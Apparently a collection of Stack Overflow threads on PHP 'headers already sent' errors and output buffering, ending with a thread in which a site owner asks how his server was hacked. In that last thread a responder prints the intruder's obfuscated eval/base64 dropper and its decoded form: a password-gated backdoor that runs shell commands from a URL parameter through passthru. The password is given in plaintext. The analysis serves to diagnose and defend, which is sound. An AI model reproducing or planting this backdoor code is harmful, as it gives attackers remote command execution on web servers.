This question already has answers here:
How to fix "Headers already sent" error in PHP
(11 answers)
Closed 8 years ago.
Getting this error:
Warning: session_start() [function.session-start]: Cannot send session
cache limiter - headers already sent (output started at
/home/apspec/public_html/home.php:105) in
/home/apspec/public_html/login.php on line 1
I've done some searching and don't see any spaces. My session start is at line 1. I think I had this error once before and something on the server was adding a space. Is there a way to check if that is the case? Any other ideas?
Dressing up jeoroen's comment:
Just because you might have written <?php session_start(); right at the start of a file, doesn't necessarily mean it's the beginning of the script! As shown by your error, you have output beginning in home.php at line 105. Perhaps you have some header stuff there, then you called include login.php; to begin session stuff.
While "nothing must come before it" is a good rule of thumb, the more accurate rule is "the script must not send output before it". Personally, I have session_start() called two layers of included files deep and even then it's somewhere around line 60 (making games means I have a LOT of init code!) but output does not begin until after all code has run - in fact, in my latest project the very last line of code to run is $template->output();, a function which takes all of the work done so far and dresses it up in all the HTML it needs.
That last point is actually quite important. Many people, especially experienced programmers, will emphasise the importance of separating your layers. At its simplest, use external CSS and JS files instead of inlining stuff in your HTML, to separate content from style from functionality. The same applies to PHP. Ideally you should avoid outputting HTML willy-nilly in your code, instead your code should do all the processing it needs and then output it at the end.
Smarty is a widely-used engine for this, but in that project I mentioned earlier $template->output() just creates a clean function scope, imports the prepared data, and calls require $file.".tpl.php"; so I can have some final post-processing. I figured that was easier than installing an entire third-party engine :p I... I have trust issues with code other people wrote. Years ago, I lost gigabytes of forum posts to a glitch in phpBB... -shivers-
Anyway, hope this rambling helps!
Related
Using an output buffer requires the server to store the entire output of the PHP in RAM, so if I have a large page, I'll wind up using a fair amount of memory - and the server will also have to wait until the entire page is generated before sending it out, which could cause a small delay. that's right ?
I don't want to know the advantage of using ob_start();. My problem is redirecting and this error: Headers already sent.
So for solving that problem, I used of ob_start(); in the fist of my codes. something like this:
<?php ob_start(); ?>
<?php
// 500 lines of code is here
header(Location: www.example.com/test.php);
?>
<html>
// 1000 lines of code is here
</html>
<?php ob_end_flush(); ?>
Now my problem has been solved, just I want to know everything is ok ? my codes are optimized ? If my requests rise, my site does not delay ?
thanks
The proper solution to the "Headers already sent" problem is described in a previous thread.
Basically, the correct cause of action is to move all of the processing code above any output to the browser. Then simply echo out the results, as needed, in between the HTML code.
Not only will you notice an improvement in the resource usage of the page, but you'll also notice that it will become a whole lot easier to actually read and write the code.
If the output branches are complex enough, which means anything above a very basic script (simple guestbook, etc), a template engine might be well worth the time and effort to look at.
Output buffering is frequently used and I wouldn't worry about this. For example, this SO webpage takes up ~ 64 KiB, meaning 16384 of these pages fit in 1 GiB ram simultaneously.
Probably offtopic, but if you're going to send a Location header, do you even need to execute all the other code? You could just send the header and exit() immediately.
This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
“Warning: Headers already sent” in PHP
I'm getting an error:
Warning: Cannot modify header information - headers already sent by (output started at /home/content/52/5148252/html/ruhuna/common/header.php:8) in /home/content/52/5148252/html/ruhuna/login.php on line 115
I know error is caused by white space but I couldn't find any blank space in my files. Therefore I added ob_start() to my header.php and the problem went away.
Am I likely to encounter any problems due to adding ob_start?
I didn't use ob_flush(), is that going to cause any problems?
If so, where would I need to add ob_flush()"
Just took a look at your code. when you change header information, you can't have any thing outputted to the site before you try to change header information. this includes any HTML, etc. You have HTML before trying to change the header, this is what the problem is.
ob_start() is safe. Sometimes if you have a very long-running script it would be better if the user could see some output as the script progresses, which ob_start() will stop from happening. But that is not normally a problem.
This question already has answers here:
How to fix "Headers already sent" error in PHP
(11 answers)
Closed 9 years ago.
I am trying to implement a fairly complex 3rd party script that consists of several interconnected scripts. I've included the intro of the script in a simple page of mine. The script basically writes different things to a string based on logic and echoes the string at the end. Sometimes it echoes a form and when you click on submit, the script runs again and based on the new logic echoes different text that displays fine inside my page where it is included in place of the earlier form. (The 3rd party script included in my page also has some includes of its own.)
My problem is that rather than have it echo some of the things it echoes, notably error os success messages, on occasion I would like to have it redirect to another page on my site.
I've done this successfully with other pages of mine. I include a script in a page that writes some header type code. Based on certain parameters or actions by the user that recall the script, the include may redirect to itself or another page. The only thing I have to make sure is that there are no spaces or text written in the course of the include prior to the redirect.
However working with this third party script, although I think I've removed all the white space, it is not letting me redirect. The error message sites the code written in my page that includes the 3rd party script. Here is the msg:
Warning: Cannot modify header information - headers already sent by (output started at /blah blah/stepone.php:5).
Step one is my simple page that calls the 3rd party script.
Am I right that an include can redirect in response to a user action even if there is some text currently displayed? Should I just be checking the third party scripts for white space or is there some structural thing I may be doing wrong.
The 3rd party scripts are too large to put in here otherwise I would put them in.
Thanks.
What you need, probably is ob_start(). This buffers the output and enables you to redirect, even when output is already generated.
Also check out the manual: http://php.net/manual/en/function.ob-start.php
the error you have mentioned happens because of headers being already send to the browser. and when it tries to send the header again it throws an error. so for example.
when you try doing something like this.
echo 'Hello World';
header('Location:some/location.php');
it might throw you an error. hence it is always good to place the redirect header on top. but sometimes we may not want that. in such case you can turn on output buffering by using php's ob_start() according to PHP's definition
This function will turn output buffering on. While output buffering is
active no output is sent from the script (other than headers), instead
the output is stored in an internal buffer
so instead of example code above you can use something like.
ob_start();
echo 'Hello World';
header('Location:some/location.php');
ob_end_flush();
You have to:
use ob_start() at the beginning of your file.
use ob_end_flush() at the end of your file.
This question already has answers here:
Closed 11 years ago.
Possible Duplicate:
Why do some scripts omit the closing php tag '?>'?
I've been reading some articles about Omitting Closing PHP tags since they say it is a good programming practice in PHP if your .php file doens't contain any other things. There are many questions like that but after I tried what they've done so far worked well on my machine. Maybe it is a fixed issue or something?
But I don't quite understand why it could be a good programming practice since it brings space or something but I've tried this one and works very well.
Master.php
<?php
echo "Master.php";
include "Slave.php";
header("Location:Slave.php");
?>
Slave.php
<?php
echo "Slave.php";
?>
I don't really quite get what the problem should be if I didn't use closing php tag.
Thanks.
The main issue is you may include additional whitespace (but it can be any chars) after the closing ?> (besides one \n which PHP allows, thanks Mario).
This extra whitespace appears to PHP as output to be sent. This makes PHP start sending the response body, therefore making any additional headers being set/modified impossible.
This is hard to debug (as whitespace is generally invisible in text editors) and often the cause of the dreaded Headers already sent error.
the problem with the closing tag is that any whitespace after the last ?> may cause bugs and is very difficult to detect while bug fixing.
It is usually better to NOT end your script with closing PHP tag.
In your case a whitespace could remain after ?> (it is very sneaky and hard to tell where error is if something breaks because of this reason), so it would be considered as output and you won't be able to start session, for example or pass headers in case if you are developing a website.
Just my opinion. I likely never end my scripts with closing tag
The problem comes from having any number of line breaks other than 1: some php parsers get upset if there isn't a newline at that end, but if you have more than one, it is printed since anything outside php tags is considered HTML.
The most common problem is that a library/model file will have an extra line break, causing the headers to be sent long before the page/view is instantiated.
This question already has answers here:
When is eval evil in php?
(20 answers)
Closed 3 years ago.
A website of mine was recently hacked. Although the actual website remain unchanged, they were somehow able to use the domain to create a link that re-directed to an ebay phishing scam.
I've taken the website down, for obvious reasons, so I can't link to the code. I'm wondering how I can go about finding out what vulnerability they used so that I can avoid this problem in the future. The page used PHP, and also some javascript (for form validation).
Is there a free service that will scan my code for vulnerabilities? What are my other options?
Thanks,
Jeff
EDIT: I've hosted the files at [link removed]
A few things to note: There are several files in the "funcs" folder, most of which aren't used, but I left them there just in case. The "new.php" (contents below) in the "data" folder is clearly the problem. The big question is, how did someone manage to upload "new.php" to the server? There's also an RTF of the e-mail I received which has info about the scam.
(caution: this code is probably "dangerous" to your computer)
<?php
$prv=strrev('edoced_46esab');
$vrp=strrev('etalfnizg');
eval($vrp($prv("rVPRbpswFNW0P9jbNE1ChojQSDD7cm0syvoB5A/GxhiBJVoKxJC0pFr667v0pe1L2k17snyvz/G559jOLxCVxjGCfEBYc1noQfE8VL0SpUYTwQah43LQueKbh3IeQYlguBx1p/gQqkqJFUKiPsWO0Vgh9LoN1R4EoUsuq7xU3Cgxgug0DhHQiVVOjVavFK9ClbDjKH2ZLgOrbpoA0RbNj/dv3r77KF3ED237vVlkrH9Wu7srzM1uv7t3h942N5mTsYM7O52s0y5jsz3thntz6gvCPiWcEVubLpO0tme+VxdHGdq3xe90WU+0wg+hQREGEi9c9G18gprOBPPZBWTMfixP1YwFdlMcNw9UVInT5XjLYqcHQcOSTxvFGyV+5q3GPcKgOzKHHFUi+Te/YmerBK0Nua/XectlnU+JRDBq7OjWKRJOEE0tSqaKIOkHs62a+StEebFDgR4UL7jc5l0Ea9JBXNiSDD3F5bpx3Zq5syaIpudx0FiAuI7gwGVPCpW4TugtnGlf/v0EZ/kWC+8F0ZafWOXazFuzeo0JX87d9tWzvlnOf/s4Xlwdiu2cXX1m/gtT+OzyinnxHw==")));
?>
Interesting stuff going on here. The php block evaluates to a nice little "code generator":
$k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53=70;
$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$s32t83r16i71n72g_o95u53t9p47u16t72=$r95e53s9o47u32r83c16e_c71r72y32p95t83e53d_c16o9d71e47;$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83=strlen($s32t83r16i71n72g_o95u53t9p47u16t72);
$e72v71a16l_p83h32p_c95o53d9e47='';
for($h47u9i53v95a32m83v16s71e72m=0;$h47u9i53v95a32m83v16s71e72m<$l72e47n71t9h_o16f_c53r83y95p32t47e71d_c9o16d53e83;$h47u9i53v95a32m83v16s71e72m++)
$e72v71a16l_p83h32p_c95o53d9e47 .= chr(ord($s32t83r16i71n72g_o95u53t9p47u16t72[$h47u9i53v95a32m83v16s71e72m]) ^ $k32e95y83_t53h16a9t71_47s72c95r83i53p16t9_71i47s72_83c53r16y9p71t47e72d53);
eval("?>".$e72v71a16l_p83h32p_c95o53d9e47."<?");
When the nasty variable names are substituted for something more readable, you get:
$Coefficient=70;
$InitialString="zy6.6KL/ fnn/55#2nb6'55oo`n+\"snb6'55o{{arwquq'ts#rw\$\"v'%~~ ~q\"%u\"vtr~sao`n/55#2nb%oooKL=Kf#%.)faz64#xa}KLf6'552.43n524/65*'5.#5nb%oo}KLf/(%*3\"#nb%o}KLf\"/#nazi64#xao}K;KLyx";
$TargetString=$InitialString;
$CntLimit=strlen($TargetString);
$Output='';
for($i=0;$i<$CntLimit;$i++)
$Output .= chr(ord($TargetString[$i]) ^ $Coefficient);
eval("?>".$Output."<?");
which, when evaluated, spits out the code:
<?php
if ((isset($_GET[pass]))&(md5($_GET[pass])==
'417379a25e41bd0ac88f87dc3d029485')&(isset($_GET[c])))
{
echo '<pre>';
passthru(stripslashes($_GET[c]));
include($_GET[c]);
die('</pre>');
}
?>
Of note, the string: '417379a25e41bd0ac88f87dc3d029485' is the md5 hash of the password: Zrhenjq2009
I'll kick this around some more tomorrow.
Edit:
Ok, so I spent a few more minutes playing with this. It's looking like a remote control script. So now that this page (new.php) is sitting on your server, If a user hits this page and passes a url parameter named 'pass' with a value of 'Zrhenjq2009', they are then able to execute an external command on the server by passing the command and arguments in the url as the parameter named 'c'. So this is turning out to be a code generator which creates a backdoor on the server. Pretty cool.
I pulled down the file you uploaded and ran new.php through VirusTotal.com and it appears to be an new (or substantially modified) trojan. Additionally, it appears that 51.php is the PHPSpy trojan: VirusTotal analysis, 74.php is the PHP.Shellbot trojan VirusTotal Analysis and func.php is "webshell by orb". Looks like someone dropped a nice hack kit on your server along with the ebay phishing scripts/pages referenced in the document you uploaded.
You should probably remove the file download link in your original post.
If you get your hands on the logs, might be interesting to take a look.
Enjoy.
If you're using a VCS (version control, like git, mercurial, subversion, cvs) you can just do a diff from the last good commit and go from there.
You are using version control, right?
Do you have access to the server logs? If you have an approximate time when the first exploit occurred, they should be able to go a long ways into helping you figure out what the person did. Other than giving general advice, its really hard to say without more information.
Can you share the code (please make sure to remove user names / passwords etc)? If so I would be willing to take a look but it might take me a day or so (Sorry, I'm currently working on a SQL Injection Vulnerability report, recommendation for identifying restricted data, and future standards/process to prevent it in the future and I have four kids at home including a 3 month old).